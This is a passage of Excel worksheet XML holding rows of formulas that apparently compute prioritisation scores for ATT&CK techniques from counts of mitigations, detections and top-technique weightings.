      <c r="A322" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3333333333333334E-2</v>
      </c>
      <c r="B322" s="25">
        <f>SUM(H322,M322,V322)*(1+SUM(AE322,AG322,AI322,AK322,AM322))</f>
        <v>0.23333333333333334</v>
      </c>
      <c r="C322" s="25" t="s">
        <v>1311</v>
      </c>
      <c r="D322" s="25" t="s">
        <v>292</v>
      </c>
      <c r="E322" s="25" t="s">
        <v>1312</v>
      </c>
      <c r="F322" s="51">
        <v>1</v>
      </c>
      <c r="G322" s="51">
        <v>1</v>
      </c>
      <c r="H322" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I322">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J322">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K322">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L322">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M322" s="25">
        <v>0</v>
      </c>
      <c r="N322" s="51">
        <v>0</v>
      </c>
      <c r="O322" s="51">
        <v>0</v>
      </c>
      <c r="P322" s="51">
        <v>0</v>
      </c>
      <c r="Q322" s="51">
        <v>0</v>
      </c>
      <c r="R322" s="52" t="s">
        <v>1313</v>
      </c>
      <c r="S322" s="51">
        <v>6</v>
      </c>
      <c r="T322" s="52" t="s">
        <v>1314</v>
      </c>
      <c r="U322" s="51">
        <v>8</v>
      </c>
      <c r="V322" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W322">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X322">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y322">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z322">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA322">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB322">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC322" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD322" s="25" t="str" cm="1">
        <f t="array" ref="AD322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE322" s="25">
        <f>IF(AD322="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF322" s="25" t="str" cm="1">
        <f t="array" ref="AF322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC322)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG322" s="25">
        <f>IF(AF322="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH322" s="25" t="str" cm="1">
        <f t="array" ref="AH322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI322" s="25">
        <f>IF(AH322="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ322" s="25" t="str" cm="1">
        <f t="array" ref="AJ322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK322" s="25">
        <f>IF(AJ322="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL322" s="25" t="str" cm="1">
        <f t="array" ref="AL322">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC322)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM322" s="25">
        <f>IF(AL322="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN322" s="60">
        <v>0</v>
      </c>
      <c r="AO322" s="51">
        <v>0</v>
      </c>
      <c r="AP322" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3333333333333334E-2</v>
      </c>
      <c r="AQ322" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.7777777777777779E-2</v>
      </c>
      <c r="AR322" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.7777777777777779E-2</v>
      </c>
      <c r="AS322" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT322" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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23" spans="1:47" ht="32.1">
      <c r="A323" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7953333333333327E-2</v>
      </c>
      <c r="B323" s="25">
        <f>SUM(H323,M323,V323)*(1+SUM(AE323,AG323,AI323,AK323,AM323))</f>
        <v>0.2795333333333333</v>
      </c>
      <c r="C323" s="25" t="s">
        <v>1315</v>
      </c>
      <c r="D323" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E323" s="25" t="s">
        <v>1316</v>
      </c>
      <c r="F323" s="51">
        <v>1</v>
      </c>
      <c r="G323" s="51">
        <v>1</v>
      </c>
      <c r="H323" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I323">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J323">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K323">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L323">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M323" s="25">
        <v>0</v>
      </c>
      <c r="N323" s="51">
        <v>0</v>
      </c>
      <c r="O323" s="51">
        <v>0</v>
      </c>
      <c r="P323" s="51">
        <v>0</v>
      </c>
      <c r="Q323" s="51">
        <v>0</v>
      </c>
      <c r="R323" s="52" t="s">
        <v>859</v>
      </c>
      <c r="S323" s="51">
        <v>14</v>
      </c>
      <c r="T323" s="51"/>
      <c r="U323" s="51">
        <v>0</v>
      </c>
      <c r="V323" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W323">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X323">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y323">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z323">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA323">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB323">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC323" s="29" t="s">
        <v>1317</v>
      </c>
      <c r="AD323" s="25" t="str" cm="1">
        <f t="array" ref="AD323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC323)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE323" s="25">
        <f>IF(AD323="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF323" s="25" t="str" cm="1">
        <f t="array" ref="AF323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG323" s="25">
        <f>IF(AF323="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH323" s="25" t="str" cm="1">
        <f t="array" ref="AH323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI323" s="25">
        <f>IF(AH323="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ323" s="25" t="str" cm="1">
        <f t="array" ref="AJ323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK323" s="25">
        <f>IF(AJ323="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL323" s="25" t="str" cm="1">
        <f t="array" ref="AL323">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC323)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM323" s="25">
        <f>IF(AL323="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN323" s="58">
        <v>0</v>
      </c>
      <c r="AO323" s="51">
        <v>0</v>
      </c>
      <c r="AP323" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7953333333333327E-2</v>
      </c>
      <c r="AQ323" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.3177777777777762E-2</v>
      </c>
      <c r="AR323" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.3177777777777762E-2</v>
      </c>
      <c r="AS323" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT323" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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24" spans="1:47" ht="32.1">
      <c r="A324" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7953333333333327E-2</v>
      </c>
      <c r="B324" s="25">
        <f>SUM(H324,M324,V324)*(1+SUM(AE324,AG324,AI324,AK324,AM324))</f>
        <v>0.2795333333333333</v>
      </c>
      <c r="C324" s="25" t="s">
        <v>1318</v>
      </c>
      <c r="D324" s="25" t="s">
        <v>205</v>
      </c>
      <c r="E324" s="25" t="s">
        <v>1319</v>
      </c>
      <c r="F324" s="51">
        <v>1</v>
      </c>
      <c r="G324" s="51">
        <v>1</v>
      </c>
      <c r="H324" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I324">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J324">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K324">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L324">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M324" s="25">
        <v>0</v>
      </c>
      <c r="N324" s="51">
        <v>0</v>
      </c>
      <c r="O324" s="51">
        <v>0</v>
      </c>
      <c r="P324" s="51">
        <v>0</v>
      </c>
      <c r="Q324" s="51">
        <v>0</v>
      </c>
      <c r="R324" s="52" t="s">
        <v>1320</v>
      </c>
      <c r="S324" s="51">
        <v>7</v>
      </c>
      <c r="T324" s="51" t="s">
        <v>415</v>
      </c>
      <c r="U324" s="51">
        <v>7</v>
      </c>
      <c r="V324" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W324">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X324">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y324">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z324">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA324">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB324">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC324" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD324" s="25" t="str" cm="1">
        <f t="array" ref="AD324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC324)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE324" s="25">
        <f>IF(AD324="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF324" s="25" t="str" cm="1">
        <f t="array" ref="AF324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG324" s="25">
        <f>IF(AF324="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH324" s="25" t="str" cm="1">
        <f t="array" ref="AH324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI324" s="25">
        <f>IF(AH324="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ324" s="25" t="str" cm="1">
        <f t="array" ref="AJ324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK324" s="25">
        <f>IF(AJ324="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL324" s="25" t="str" cm="1">
        <f t="array" ref="AL324">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC324)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM324" s="25">
        <f>IF(AL324="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN324" s="58">
        <v>0</v>
      </c>
      <c r="AO324" s="51">
        <v>0</v>
      </c>
      <c r="AP324" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7953333333333327E-2</v>
      </c>
      <c r="AQ324" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.3177777777777762E-2</v>
      </c>
      <c r="AR324" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.3177777777777762E-2</v>
      </c>
      <c r="AS324" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT324" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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25" spans="1:47">
      <c r="A325" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3333333333333334E-2</v>
      </c>
      <c r="B325" s="25">
        <f>SUM(H325,M325,V325)*(1+SUM(AE325,AG325,AI325,AK325,AM325))</f>
        <v>0.23333333333333334</v>
      </c>
      <c r="C325" s="25" t="s">
        <v>1321</v>
      </c>
      <c r="D325" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E325" s="25" t="s">
        <v>1322</v>
      </c>
      <c r="F325" s="51">
        <v>1</v>
      </c>
      <c r="G325" s="51">
        <v>1</v>
      </c>
      <c r="H325" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I325">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J325">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K325">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L325">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M325" s="25">
        <v>0</v>
      </c>
      <c r="N325" s="51">
        <v>0</v>
      </c>
      <c r="O325" s="51">
        <v>0</v>
      </c>
      <c r="P325" s="51">
        <v>0</v>
      </c>
      <c r="Q325" s="51">
        <v>0</v>
      </c>
      <c r="R325" s="52" t="s">
        <v>1263</v>
      </c>
      <c r="S325" s="51">
        <v>7</v>
      </c>
      <c r="T325" s="51" t="s">
        <v>1264</v>
      </c>
      <c r="U325" s="51">
        <v>7</v>
      </c>
      <c r="V325" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="W325">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>14</v>
      </c>
      <c r="X325">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Y325">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.25454545454545452</v>
      </c>
      <c r="Z325">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA325">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB325">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC325" s="29"/>
      <c r="AD325" s="25" t="str" cm="1">
        <f t="array" ref="AD325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE325" s="25">
        <f>IF(AD325="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF325" s="25" t="str" cm="1">
        <f t="array" ref="AF325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG325" s="25">
        <f>IF(AF325="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH325" s="25" t="str" cm="1">
        <f t="array" ref="AH325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI325" s="25">
        <f>IF(AH325="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ325" s="25" t="str" cm="1">
        <f t="array" ref="AJ325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK325" s="25">
        <f>IF(AJ325="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL325" s="25" t="str" cm="1">
        <f t="array" ref="AL325">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC325)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM325" s="25">
        <f>IF(AL325="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN325" s="52">
        <v>0</v>
      </c>
      <c r="AO325" s="51">
        <v>0</v>
      </c>
      <c r="AP325" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3333333333333334E-2</v>
      </c>
      <c r="AQ325" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.7777777777777779E-2</v>
      </c>
      <c r="AR325" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.7777777777777779E-2</v>
      </c>
      <c r="AS325" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT325" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU32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26" spans="1:47" ht="32.1">
      <c r="A326" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11833333333333335</v>
      </c>
      <c r="B326" s="25">
        <f>SUM(H326,M326,V326)*(1+SUM(AE326,AG326,AI326,AK326,AM326))</f>
        <v>0.18333333333333335</v>
      </c>
      <c r="C326" s="25" t="s">
        <v>1323</v>
      </c>
      <c r="D326" s="25" t="s">
        <v>1324</v>
      </c>
      <c r="E326" s="25" t="s">
        <v>586</v>
      </c>
      <c r="F326" s="51">
        <v>0</v>
      </c>
      <c r="G326" s="51">
        <v>1</v>
      </c>
      <c r="H326" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I326">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J326">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K326">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L326">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M326" s="25">
        <v>0</v>
      </c>
      <c r="N326" s="51">
        <v>0</v>
      </c>
      <c r="O326" s="51">
        <v>0</v>
      </c>
      <c r="P326" s="51">
        <v>0</v>
      </c>
      <c r="Q326" s="51">
        <v>0</v>
      </c>
      <c r="R326" s="52" t="s">
        <v>1325</v>
      </c>
      <c r="S326" s="51">
        <v>3</v>
      </c>
      <c r="T326" s="52" t="s">
        <v>1035</v>
      </c>
      <c r="U326" s="51">
        <v>11</v>
      </c>
      <c r="V326" s="25">
